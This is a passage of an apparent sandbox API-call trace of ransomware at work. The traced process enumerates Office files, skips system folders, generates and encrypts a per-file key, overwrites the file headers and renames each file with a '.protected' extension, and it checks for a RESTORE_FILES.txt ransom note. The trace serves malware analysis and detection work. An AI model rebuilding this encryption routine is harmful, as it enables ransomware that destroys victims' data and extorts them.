[0067.406] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.406] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="Windows") returned -1 [0067.407] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="Program Files") returned -1 [0067.407] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.407] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.407] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0067.407] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll") returned 72 [0067.407] StrStrIW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0067.407] lstrcmpW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.407] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.407] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.407] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.407] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll") returned 72 [0067.407] StrStrW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0067.407] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll") returned 72 
[0067.407] StrStrW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0067.407] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll") returned 72 [0067.407] StrStrW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0067.407] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.417] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.418] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.418] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.418] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.544] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.544] CloseHandle (hObject=0xd8) returned 1 [0067.544] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.protected") returned 82 [0067.544] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll"), 
lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll.protected")) returned 1 [0067.544] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.544] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="Windows") returned -1 [0067.544] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="Program Files") returned -1 [0067.545] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.545] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.545] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0067.545] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll") returned 72 [0067.545] StrStrIW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0067.545] lstrcmpW (lpString1="GRINTL32.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.545] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.545] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.545] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.545] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll") 
returned 72 [0067.545] StrStrW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0067.545] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll") returned 72 [0067.545] StrStrW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0067.545] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll") returned 72 [0067.545] StrStrW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0067.546] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.586] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.586] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.586] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.586] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.608] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.608] CloseHandle (hObject=0xd8) returned 1 [0067.609] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.protected") returned 82 
[0067.609] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll.protected")) returned 1 [0067.609] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.609] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="Windows") returned -1 [0067.609] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="Program Files") returned -1 [0067.609] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.609] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.609] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="System Volume Information") returned -1 [0067.609] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll") returned 73 [0067.609] StrStrIW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".protected") returned 0x0 [0067.610] lstrcmpW (lpString1="GRINTL32.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.610] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.610] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.610] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.610] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll") returned 73 [0067.610] StrStrW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".txt") returned 0x0 [0067.611] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll") returned 73 [0067.611] StrStrW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".rar") returned 0x0 [0067.611] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll") returned 73 [0067.611] StrStrW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".zip") returned 0x0 [0067.611] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.629] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.629] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.629] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.629] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.630] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.630] 
CloseHandle (hObject=0xd8) returned 1 [0067.631] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.protected") returned 83 [0067.631] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll.protected")) returned 1 [0067.631] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.631] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="Windows") returned -1 [0067.631] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="Program Files") returned -1 [0067.631] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.631] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.631] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0067.631] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll") returned 69 [0067.631] StrStrIW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0067.631] lstrcmpW (lpString1="MAPIR.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.631] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.632] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.632] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.635] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll") returned 69 [0067.635] StrStrW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0067.635] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll") returned 69 [0067.635] StrStrW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0067.635] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll") returned 69 [0067.635] StrStrW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0067.636] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.645] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.646] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.646] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.646] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.647] WriteFile (in: hFile=0xd8, 
lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.647] CloseHandle (hObject=0xd8) returned 1 [0067.648] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.protected") returned 79 [0067.648] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll.protected")) returned 1 [0067.649] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.649] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="Windows") returned -1 [0067.649] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="Program Files") returned -1 [0067.649] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.650] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.650] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="System Volume Information") returned -1 [0067.650] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll") returned 72 [0067.650] StrStrIW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".protected") returned 0x0 [0067.650] lstrcmpW (lpString1="MOR6INT.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.650] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.650] CryptEncrypt (in: hKey=0x444cf8, 
hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.650] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.650] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll") returned 72 [0067.650] StrStrW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".txt") returned 0x0 [0067.650] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll") returned 72 [0067.650] StrStrW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".rar") returned 0x0 [0067.650] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll") returned 72 [0067.650] StrStrW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".zip") returned 0x0 [0067.651] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.673] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.673] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.674] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.674] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.703] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.703] CloseHandle (hObject=0xd8) returned 1 [0067.704] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.protected") returned 82 [0067.704] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll.protected")) returned 1 [0067.704] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.704] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0067.704] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="Program Files") returned -1 [0067.704] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.704] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.704] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0067.704] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll") returned 71 [0067.704] StrStrIW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0067.704] lstrcmpW 
(lpString1="MSOINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.704] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.704] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.704] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.705] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll") returned 71 [0067.705] StrStrW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0067.705] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll") returned 71 [0067.705] StrStrW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0067.705] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll") returned 71 [0067.705] StrStrW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0067.705] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.713] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.713] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) 
